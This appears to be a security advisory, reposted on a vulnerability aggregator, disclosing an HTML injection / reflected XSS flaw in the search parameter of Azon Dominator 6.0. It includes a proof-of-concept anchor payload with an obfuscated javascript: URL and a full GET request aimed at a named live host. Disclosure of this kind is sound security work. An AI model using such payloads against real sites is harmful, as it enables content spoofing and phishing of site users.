Azon Dominator 6.0 HTML Injection

🗓️ 17 Mar 2025 00:00:00Reported by Seyfullah KILIÇType

packetstorm🔗 packetstorm.news👁 141 Views

Azon Dominator 6.0 has HTML Injection vulnerability due to insufficient input validation in search.

Hi There,
    
    Azon Dominator is vulnerable to an HTML Injection vulnerability in its
    search functionality. The issue arises due to insufficient input validation
    in the q parameter, allowing an attacker to inject arbitrary HTML elements.
    This could lead to potential security risks such as content manipulation or
    phishing attacks.
    
    Source URL: https://azon-dominator.webister.net/
    Source Name: Seyfullah Kılıç
    Software URL: https://azon-dominator.webister.net/
    
    *Proof of Concept (PoC):*
    Vulnerable Endpoint:
    URL: https://azon-dominator.webister.net/searchurl?q=
    Method: GET
    Parameter Affected: q
    Vulnerability Type: Reflected XSS / HTML Injection
    
    *Payload Example:*
    <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
    
    *Request Example:*
    GET
    /search?q=%3Ca%20href=%22javas\x00cript:javascript:alert(1)%22%20id=%22fuzzelement1%22%3Etest%3C/a%3E
    HTTP/2
    Host: azon-dominator.webister.net
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    
    This vulnerability allows an attacker to inject arbitrary HTML content into
    the search query, potentially leading to security risks such as content
    spoofing or malicious script injection.
    
    Regards.
    
    -- 
    
    *Seyfullah KILIÇ*
    
    *CEO - Founder*

17 Mar 2025 00:00Current

7.7High risk

Vulners AI Score7.7